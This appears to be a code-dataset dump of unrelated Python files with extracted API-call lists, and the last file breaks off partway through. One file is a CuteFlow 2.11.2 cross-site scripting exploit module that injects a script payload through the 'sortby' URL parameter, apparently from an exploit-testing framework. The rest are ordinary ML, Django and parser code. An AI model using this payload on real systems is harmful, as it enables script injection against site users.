skyportal.models import init_db, Base, DBSession, Source, User\n'), ((9701, 9727), 'os.getpgid', 'os.getpgid', (['web_client.pid'], {}), '(web_client.pid)\n', (9711, 9727), False, 'import os\n'), ((7938, 7963), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (7953, 7963), False, 'import os\n'), 
((8484, 8515), 'datetime.datetime', 'datetime.datetime', (['(2014)', '(10)', '(24)'], {}), '(2014, 10, 24)\n', (8501, 8515), False, 'import datetime\n'), ((9048, 9070), 'os.path.abspath', 'os.path.abspath', (['fpath'], {}), '(fpath)\n', (9063, 9070), False, 'import os\n')] |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
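    # exploit: load the mail list page with a script payload in the "sortby" parameter; a JavaScript alert confirms the XSS fired.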
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| [
"framework.Exploit.__init__",
"time.sleep"
] | [((825, 866), 'framework.Exploit.__init__', 'framework.Exploit.__init__', (['self', 'visible'], {}), '(self, visible)\n', (851, 866), False, 'import framework\n'), ((1428, 1442), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1438, 1442), False, 'import time\n')] |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
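    # Merge every list-valued key across the four partial results; the '0seg,f_step,f_stop' metadata entry is rebuilt separately below.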
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True) | [
"json.load",
"os.listdir",
"json.dump"
] | [((743, 767), 'os.listdir', 'os.listdir', (['jsonPathTemp'], {}), '(jsonPathTemp)\n', (753, 767), False, 'import os\n'), ((237, 252), 'json.load', 'json.load', (['file'], {}), '(file)\n', (246, 252), False, 'import json\n'), ((331, 352), 'json.dump', 'json.dump', (['dicc', 'file'], {}), '(dicc, file)\n', (340, 352), False, 'import json\n')] |
# Generated by Django 3.0.2 on 2020-01-23 11:02
import re
import django.contrib.postgres.fields.citext
import django.core.validators
from django.db import migrations
import grandchallenge.challenges.models
class Migration(migrations.Migration):
dependencies = [
("challenges", "0022_auto_20200121_1639"),
]
operations = [
migrations.AlterField(
model_name="challenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
migrations.AlterField(
model_name="externalchallenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
]
| [
"re.compile"
] | [((861, 893), 're.compile', 're.compile', (['"""^[-a-zA-Z0-9_]+\\\\Z"""'], {}), "('^[-a-zA-Z0-9_]+\\\\Z')\n", (871, 893), False, 'import re\n'), ((1696, 1728), 're.compile', 're.compile', (['"""^[-a-zA-Z0-9_]+\\\\Z"""'], {}), "('^[-a-zA-Z0-9_]+\\\\Z')\n", (1706, 1728), False, 'import re\n')] |
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve, validation_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
    train_scores, test_scores = validation_curve(estimator, X, y, param_name=param_name, param_range=param_range, cv=cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
| [
"numpy.mean",
"matplotlib.pyplot.grid",
"sklearn.model_selection.learning_curve",
"matplotlib.pyplot.xscale",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.fill_between",
"numpy.linspace",
"matplotlib.pyplot.figure",
"numpy.std",
"matplotlib.pyplot.title",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((282, 306), 'numpy.linspace', 'np.linspace', (['(0.1)', '(1.0)', '(5)'], {}), '(0.1, 1.0, 5)\n', (293, 306), True, 'import numpy as np\n'), ((312, 324), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (322, 324), True, 'import matplotlib.pyplot as plt\n'), ((329, 345), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (338, 345), True, 'import matplotlib.pyplot as plt\n'), ((399, 430), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Training examples"""'], {}), "('Training examples')\n", (409, 430), True, 'import matplotlib.pyplot as plt\n'), ((435, 454), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Score"""'], {}), "('Score')\n", (445, 454), True, 'import matplotlib.pyplot as plt\n'), ((500, 578), 'sklearn.model_selection.learning_curve', 'learning_curve', (['estimator', 'X', 'y'], {'cv': 'cv', 'n_jobs': 'n_jobs', 'train_sizes': 'train_sizes'}), '(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n', (514, 578), False, 'from sklearn.model_selection import learning_curve\n'), ((612, 641), 'numpy.mean', 'np.mean', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (619, 641), True, 'import numpy as np\n'), ((665, 693), 'numpy.std', 'np.std', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (671, 693), True, 'import numpy as np\n'), ((717, 745), 'numpy.mean', 'np.mean', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (724, 745), True, 'import numpy as np\n'), ((768, 795), 'numpy.std', 'np.std', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (774, 795), True, 'import numpy as np\n'), ((800, 814), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (808, 814), True, 'import matplotlib.pyplot as plt\n'), ((820, 952), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['train_sizes', '(train_scores_mean - train_scores_std)', '(train_scores_mean + train_scores_std)'], {'alpha': '(0.1)', 'color': '"""r"""'}), "(train_sizes, train_scores_mean - train_scores_std, \n train_scores_mean + train_scores_std, alpha=0.1, color='r')\n", (836, 952), True, 'import matplotlib.pyplot as plt\n'), ((994, 1122), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['train_sizes', '(test_scores_mean - test_scores_std)', '(test_scores_mean + test_scores_std)'], {'alpha': '(0.1)', 'color': '"""g"""'}), "(train_sizes, test_scores_mean - test_scores_std, \n test_scores_mean + test_scores_std, alpha=0.1, color='g')\n", (1010, 1122), True, 'import matplotlib.pyplot as plt\n'), ((1143, 1229), 'matplotlib.pyplot.plot', 'plt.plot', (['train_sizes', 'train_scores_mean', '"""o-"""'], {'color': '"""r"""', 'label': '"""Training score"""'}), "(train_sizes, train_scores_mean, 'o-', color='r', label=\n 'Training score')\n", (1151, 1229), True, 'import matplotlib.pyplot as plt\n'), ((1242, 1329), 'matplotlib.pyplot.plot', 'plt.plot', (['train_sizes', 'test_scores_mean', '"""o-"""'], {'color': '"""g"""', 'label': '"""Validation score"""'}), "(train_sizes, test_scores_mean, 'o-', color='g', label=\n 'Validation score')\n", (1250, 1329), True, 'import matplotlib.pyplot as plt\n'), ((1343, 1365), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1353, 1365), True, 'import matplotlib.pyplot as plt\n'), ((1370, 1380), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1378, 1380), True, 'import matplotlib.pyplot as plt\n'), ((1562, 1586), 'numpy.linspace', 'np.linspace', (['(0.1)', '(1.0)', '(5)'], {}), '(0.1, 1.0, 5)\n', (1573, 1586), True, 'import numpy 
as np\n'), ((1700, 1729), 'numpy.mean', 'np.mean', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (1707, 1729), True, 'import numpy as np\n'), ((1746, 1774), 'numpy.std', 'np.std', (['train_scores'], {'axis': '(1)'}), '(train_scores, axis=1)\n', (1752, 1774), True, 'import numpy as np\n'), ((1791, 1819), 'numpy.mean', 'np.mean', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (1798, 1819), True, 'import numpy as np\n'), ((1835, 1862), 'numpy.std', 'np.std', (['test_scores'], {'axis': '(1)'}), '(test_scores, axis=1)\n', (1841, 1862), True, 'import numpy as np\n'), ((1867, 1965), 'matplotlib.pyplot.plot', 'plt.plot', (['param_range', 'train_mean'], {'color': '"""r"""', 'marker': '"""o"""', 'markersize': '(5)', 'label': '"""Training score"""'}), "(param_range, train_mean, color='r', marker='o', markersize=5,\n label='Training score')\n", (1875, 1965), True, 'import matplotlib.pyplot as plt\n'), ((1966, 2070), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['param_range', '(train_mean + train_std)', '(train_mean - train_std)'], {'alpha': '(0.15)', 'color': '"""r"""'}), "(param_range, train_mean + train_std, train_mean -\n train_std, alpha=0.15, color='r')\n", (1982, 2070), True, 'import matplotlib.pyplot as plt\n'), ((2071, 2186), 'matplotlib.pyplot.plot', 'plt.plot', (['param_range', 'test_mean'], {'color': '"""g"""', 'linestyle': '"""--"""', 'marker': '"""s"""', 'markersize': '(5)', 'label': '"""Validation score"""'}), "(param_range, test_mean, color='g', linestyle='--', marker='s',\n markersize=5, label='Validation score')\n", (2079, 2186), True, 'import matplotlib.pyplot as plt\n'), ((2187, 2287), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['param_range', '(test_mean + test_std)', '(test_mean - test_std)'], {'alpha': '(0.15)', 'color': '"""g"""'}), "(param_range, test_mean + test_std, test_mean - test_std,\n alpha=0.15, color='g')\n", (2203, 2287), True, 'import matplotlib.pyplot as plt\n'), ((2288, 2302), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (2296, 2302), True, 'import matplotlib.pyplot as plt\n'), ((2308, 2325), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (2318, 2325), True, 'import matplotlib.pyplot as plt\n'), ((2330, 2352), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (2340, 2352), True, 'import matplotlib.pyplot as plt\n'), ((2358, 2381), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Parameter"""'], {}), "('Parameter')\n", (2368, 2381), True, 'import matplotlib.pyplot as plt\n'), ((2387, 2406), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Score"""'], {}), "('Score')\n", (2397, 2406), True, 'import matplotlib.pyplot as plt\n'), ((2412, 2426), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ylim'], {}), '(ylim)\n', (2420, 2426), True, 'import matplotlib.pyplot as plt\n'), ((379, 394), 'matplotlib.pyplot.ylim', 'plt.ylim', (['*ylim'], {}), '(*ylim)\n', (387, 394), True, 'import matplotlib.pyplot as plt\n')] |
## @file
# This file is used to define class objects of INF file miscellaneous.
# Include BootMode/HOB/Event and others. It will be consumed by InfParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
'''
InfMisc
'''
import Logger.Log as Logger
from Logger import ToolError
from Library import DataType as DT
from Object.Parser.InfCommonObject import InfSectionCommonDef
from Library.Misc import Sdict
##
# BootModeObject
#
class InfBootModeObject():
def __init__(self):
self.SupportedBootModes = ''
self.HelpString = ''
self.Usage = ''
def SetSupportedBootModes(self, SupportedBootModes):
self.SupportedBootModes = SupportedBootModes
def GetSupportedBootModes(self):
return self.SupportedBootModes
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# EventObject
#
class InfEventObject():
def __init__(self):
self.EventType = ''
self.HelpString = ''
self.Usage = ''
def SetEventType(self, EventType):
self.EventType = EventType
def GetEventType(self):
return self.EventType
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# HobObject
#
class InfHobObject():
def __init__(self):
self.HobType = ''
self.Usage = ''
self.SupArchList = []
self.HelpString = ''
def SetHobType(self, HobType):
self.HobType = HobType
def GetHobType(self):
return self.HobType
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
def SetSupArchList(self, ArchList):
self.SupArchList = ArchList
def GetSupArchList(self):
return self.SupArchList
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
##
# InfSpecialCommentObject
#
class InfSpecialCommentObject(InfSectionCommonDef):
def __init__(self):
self.SpecialComments = Sdict()
InfSectionCommonDef.__init__(self)
def SetSpecialComments(self, SepcialSectionList = None, Type = ''):
if Type == DT.TYPE_HOB_SECTION or \
Type == DT.TYPE_EVENT_SECTION or \
Type == DT.TYPE_BOOTMODE_SECTION:
for Item in SepcialSectionList:
if Type in self.SpecialComments:
ObjList = self.SpecialComments[Type]
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
else:
ObjList = []
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
return True
def GetSpecialComments(self):
return self.SpecialComments
## ErrorInInf
#
# An encapsulate of Error for INF parser.
#
def ErrorInInf(Message=None, ErrorCode=None, LineInfo=None, RaiseError=True):
if ErrorCode is None:
ErrorCode = ToolError.FORMAT_INVALID
if LineInfo is None:
LineInfo = ['', -1, '']
Logger.Error("InfParser",
ErrorCode,
Message=Message,
File=LineInfo[0],
Line=LineInfo[1],
ExtraData=LineInfo[2],
RaiseError=RaiseError)
| [
"Logger.Log.Error",
"Object.Parser.InfCommonObject.InfSectionCommonDef.__init__",
"Library.Misc.Sdict"
] | [((3454, 3593), 'Logger.Log.Error', 'Logger.Error', (['"""InfParser"""', 'ErrorCode'], {'Message': 'Message', 'File': 'LineInfo[0]', 'Line': 'LineInfo[1]', 'ExtraData': 'LineInfo[2]', 'RaiseError': 'RaiseError'}), "('InfParser', ErrorCode, Message=Message, File=LineInfo[0],\n Line=LineInfo[1], ExtraData=LineInfo[2], RaiseError=RaiseError)\n", (3466, 3593), True, 'import Logger.Log as Logger\n'), ((2429, 2436), 'Library.Misc.Sdict', 'Sdict', ([], {}), '()\n', (2434, 2436), False, 'from Library.Misc import Sdict\n'), ((2445, 2479), 'Object.Parser.InfCommonObject.InfSectionCommonDef.__init__', 'InfSectionCommonDef.__init__', (['self'], {}), '(self)\n', (2473, 2479), False, 'from Object.Parser.InfCommonObject import InfSectionCommonDef\n')] |
import torch
import torchvision
import torchvision.transforms as transforms
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
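# Convert CIFAR-10 images to tensors and normalize each RGB channel from [0, 1] to [-1, 1].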
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
root = os.path.join(BASE_DIR, '../data/')
trainset = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset,
shuffle=False, num_workers=2)
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# print(x.shape)
x = self.pool(F.relu(self.conv1(x)))
# print(x.shape)
x = self.pool(F.relu(self.conv2(x)))
# print(x.shape)
x = x.view(-1, 16 * 5 * 5)
# print(x.shape)
x = F.relu(self.fc1(x))
# print(x.shape)
x = F.relu(self.fc2(x))
# print(x.shape)
x = self.fc3(x)
# print(x.shape)
return x
# torch.Size([1, 3, 32, 32])
# torch.Size([1, 6, 14, 14])
# torch.Size([1, 16, 5, 5])
# torch.Size([1, 400])
# torch.Size([1, 120])
# torch.Size([1, 84])
# torch.Size([1, 100])
model = Net()
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.0002, momentum=0.9)
from util import train_eval
train_eval(model, criterion, trainloader, testloader, optimizer, epochs=5)
# [1, 5000] loss: 2.293
# [1, 10000] loss: 2.075
# [1, 15000] loss: 1.876
# [1, 20000] loss: 1.754
# [1, 25000] loss: 1.658
# [1, 30000] loss: 1.625
# [1, 35000] loss: 1.558
# [1, 40000] loss: 1.520
# [1, 45000] loss: 1.494
# [1, 50000] loss: 1.459
# 1/5 4456/10000 44.56% (107.18255376815796s)
# [2, 5000] loss: 1.413
# [2, 10000] loss: 1.398
# [2, 15000] loss: 1.386
# [2, 20000] loss: 1.379
# [2, 25000] loss: 1.358
# [2, 30000] loss: 1.324
# [2, 35000] loss: 1.333
# [2, 40000] loss: 1.280
# [2, 45000] loss: 1.296
# [2, 50000] loss: 1.304
# 2/5 5357/10000 53.56999999999999% (105.8866639137268s)
# [3, 5000] loss: 1.226
# [3, 10000] loss: 1.231
# [3, 15000] loss: 1.215
# [3, 20000] loss: 1.235
# [3, 25000] loss: 1.199
# [3, 30000] loss: 1.187
# [3, 35000] loss: 1.192
# [3, 40000] loss: 1.194
# [3, 45000] loss: 1.196
# [3, 50000] loss: 1.191
# 3/5 5729/10000 57.29% (105.63971090316772s)
# [4, 5000] loss: 1.117
# [4, 10000] loss: 1.096
# [4, 15000] loss: 1.121
# [4, 20000] loss: 1.123
# [4, 25000] loss: 1.107
# [4, 30000] loss: 1.120
# [4, 35000] loss: 1.124
# [4, 40000] loss: 1.094
# [4, 45000] loss: 1.105
# [4, 50000] loss: 1.102
# 4/5 5829/10000 58.29% (112.56915497779846s)
# [5, 5000] loss: 1.034
# [5, 10000] loss: 1.024
# [5, 15000] loss: 1.040
# [5, 20000] loss: 1.027
# [5, 25000] loss: 1.043
# [5, 30000] loss: 1.049
# [5, 35000] loss: 1.024
# [5, 40000] loss: 1.042
# [5, 45000] loss: 1.027
# [5, 50000] loss: 1.027
# 5/5 6178/10000 61.78% (109.75669193267822s)
# 61.0% (541.0347754955292s)
| [
"torch.nn.CrossEntropyLoss",
"util.train_eval",
"torch.nn.Conv2d",
"torchvision.datasets.CIFAR10",
"torch.nn.MaxPool2d",
"torchvision.transforms.Normalize",
"torch.utils.data.DataLoader",
"torch.nn.Linear",
"torchvision.transforms.ToTensor"
] | [((322, 413), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', ([], {'root': 'root', 'train': '(True)', 'download': '(True)', 'transform': 'transform'}), '(root=root, train=True, download=True,\n transform=transform)\n', (350, 413), False, 'import torchvision\n'), ((464, 530), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['trainset'], {'shuffle': '(True)', 'num_workers': '(2)'}), '(trainset, shuffle=True, num_workers=2)\n', (491, 530), False, 'import torch\n'), ((584, 676), 'torchvision.datasets.CIFAR10', 'torchvision.datasets.CIFAR10', ([], {'root': 'root', 'train': '(False)', 'download': '(True)', 'transform': 'transform'}), '(root=root, train=False, download=True,\n transform=transform)\n', (612, 676), False, 'import torchvision\n'), ((725, 791), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['testset'], {'shuffle': '(False)', 'num_workers': '(2)'}), '(testset, shuffle=False, num_workers=2)\n', (752, 791), False, 'import torch\n'), ((1879, 1900), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1898, 1900), True, 'import torch.nn as nn\n'), ((1999, 2073), 'util.train_eval', 'train_eval', (['model', 'criterion', 'trainloader', 'testloader', 'optimizer'], {'epochs': '(5)'}), '(model, criterion, trainloader, testloader, optimizer, epochs=5)\n', (2009, 2073), False, 'from util import train_eval\n'), ((183, 204), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (202, 204), True, 'import torchvision.transforms as transforms\n'), ((211, 265), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.5, 0.5, 0.5)', '(0.5, 0.5, 0.5)'], {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n', (231, 265), True, 'import torchvision.transforms as transforms\n'), ((993, 1011), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(6)', '(5)'], {}), '(3, 6, 5)\n', (1002, 1011), True, 'import torch.nn as nn\n'), ((1032, 1050), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)', '(2)'], {}), '(2, 2)\n', (1044, 1050), True, 'import torch.nn as nn\n'), ((1072, 1091), 'torch.nn.Conv2d', 'nn.Conv2d', (['(6)', '(16)', '(5)'], {}), '(6, 16, 5)\n', (1081, 1091), True, 'import torch.nn as nn\n'), ((1111, 1137), 'torch.nn.Linear', 'nn.Linear', (['(16 * 5 * 5)', '(120)'], {}), '(16 * 5 * 5, 120)\n', (1120, 1137), True, 'import torch.nn as nn\n'), ((1157, 1175), 'torch.nn.Linear', 'nn.Linear', (['(120)', '(84)'], {}), '(120, 84)\n', (1166, 1175), True, 'import torch.nn as nn\n'), ((1195, 1212), 'torch.nn.Linear', 'nn.Linear', (['(84)', '(10)'], {}), '(84, 10)\n', (1204, 1212), True, 'import torch.nn as nn\n')] |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
